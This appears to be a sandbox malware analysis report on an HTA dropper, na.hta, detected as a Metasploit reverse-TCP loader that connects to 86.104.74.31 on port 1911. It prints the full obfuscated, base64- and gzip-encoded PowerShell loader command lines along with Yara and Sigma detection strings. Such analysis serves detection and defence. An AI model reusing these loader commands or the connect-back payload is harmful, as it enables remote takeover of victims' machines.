
Windows Analysis Report
na.hta

Overview

General Information

Sample name: na.hta
Analysis ID: 1534778
MD5: 80d63e57cf21fda8b8c90e474eb46a4a
SHA1: ca838f1b1972ceefbeda106c0f201a87d3d8a5c9
SHA256: 23d30acfa7336b1bcd1a62a2225f1ad2c2f82f683cf70041874bb9ecfad9dfec
Tags: hta, user-abuse_ch

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
Yara detected MetasploitPayload
AI detected suspicious sample
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6304 cmdline: mshta.exe "C:\Users\user\Desktop\na.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4800 cmdline: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg
0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware configuration: {"Type": "Metasploit Connect", "IP": "86.104.74.31", "Port": 1911}
Source | Rule | Description | Author | Strings
na.hta | Susp_PowerShell_Sep17_2 | Detects suspicious PowerShell script in combo with VBS or JS | Florian Roth
  • 0x143:$x1: .Run "powershell.exe -nop -w hidden -e
  • 0x105:$x2: FileExists(path + "\..\powershell.exe")
  • 0x1f:$x3: window.moveTo -4000, -4000
  • 0x4c:$s1: = CreateObject("Wscript.Shell")

Source | Rule | Description | Author | Strings
00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  • 0x4bd0:$s1: kernel32.dll WaitForSingleObject),
  • 0x40c6:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x457e:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x462c:$s5: = [System.Convert]::FromBase64String(
  • 0x42f3:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x44d8:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security
00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp | Windows_Trojan_Metasploit_4a1c4da8 | Identifies Metasploit 64 bit reverse tcp shellcode. | unknown
  • 0xd8:$a: 6A 10 56 57 68 99 A5 74 61 FF D5 85 C0 74 0A FF 4E 08
00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MetasploitPayload_3 | Yara detected Metasploit Payload | Joe Security

Source | Rule | Description | Author | Strings
amsi32_4800.amsi.csv | JoeSecurity_MetasploitPayload_1 | Yara detected MetasploitPayload | Joe Security
amsi32_4800.amsi.csv | Msfpayloads_msf_ref | Metasploit Payloads - file msf-ref.ps1 | Florian Roth
  • 0xb453:$s1: kernel32.dll WaitForSingleObject),
  • 0xa930:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0xadf5:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0xaea8:$s5: = [System.Convert]::FromBase64String(
  • 0xab64:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0xad4e:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

          System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -nop -w hidden -c &([scriptblock]::create(... (the full PID 4800 command line is listed in the process tree above)
Source: Process started; Author: John Lambert (rule); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e ... (the PID 4828 command line listed in the process tree above)
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp); Data: Command: "powershell.exe" -nop -w hidden -c ... (PID 4800, see process tree above)
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e ... (PID 4828, see process tree above)
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e ... (PID 4828, see process tree above)
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e ... (PID 4828, see process tree above)
Source: Process started; Author: Hieu Tran; Data: Command: "powershell.exe" -nop -w hidden -c ... (PID 4800, see process tree above)
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIA
bwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB
Source: Process started; Author: frack113; Data: Command: "powershell.exe" -nop -w hidden -c ... (PID 4800, see process tree above)
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e ... (PID 4828, see process tree above)
          No Suricata rule has matched

          AV Detection

Source: na.hta; Avira: detected
Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "IP": "86.104.74.31", "Port": 1911}
Source: na.hta; ReversingLabs: Detection: 63%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.0% probability
Source: global traffic; TCP traffic: 192.168.2.6:49711 -> 86.104.74.31:1911
Source: Joe Sandbox View; ASN Name: TELE-ROM-ASstrAleeaPaciiBlB5Ap16RO
Source: unknown; TCP traffic detected without corresponding DNS query: 86.104.74.31
Source: powershell.exe, 00000001.00000002.2187985444.00000000071F0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2181031208.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2181031208.0000000005234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2284451182.0000000004D70000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2185051955.0000000005A46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2294071044.0000000005B26000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

          System Summary

          Source: na.hta, type: SAMPLE | Matched rule: Detects suspicious PowerShell script in combo with VBS or JS, Author: Florian Roth
          Source: amsi32_4800.amsi.csv, type: OTHER | Matched rule: Metasploit Payloads - file msf-ref.ps1, Author: Florian Roth
          Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf-ref.ps1, Author: Florian Roth
          Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode., Author: unknown
          Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode., Author: unknown
          Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf-ref.ps1, Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR | Matched rule: Metasploit Payloads - file msf-ref.ps1, Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 7110
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 2260
          Source: na.hta, type: SAMPLE | Matched rule: Susp_PowerShell_Sep17_2 date = 2017-09-30, hash1 = e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8, author = Florian Roth, description = Detects suspicious PowerShell script in combo with VBS or JS, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: amsi32_4800.amsi.csv, type: OTHER | Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000003.00000002.2296504585.0000000007000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000003.00000002.2300461306.0000000007E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
          Source: 00000003.00000002.2284451182.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
          Source: 00000003.00000002.2284451182.0000000004C17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR | Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 4800, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engine | Classification label: mal100.troj.evad.winHTA@7/5@0/1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbf2cmnh.bsa.ps1
          Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: na.hta | ReversingLabs: Detection: 63%
          Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\na.hta"
          Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e 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
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1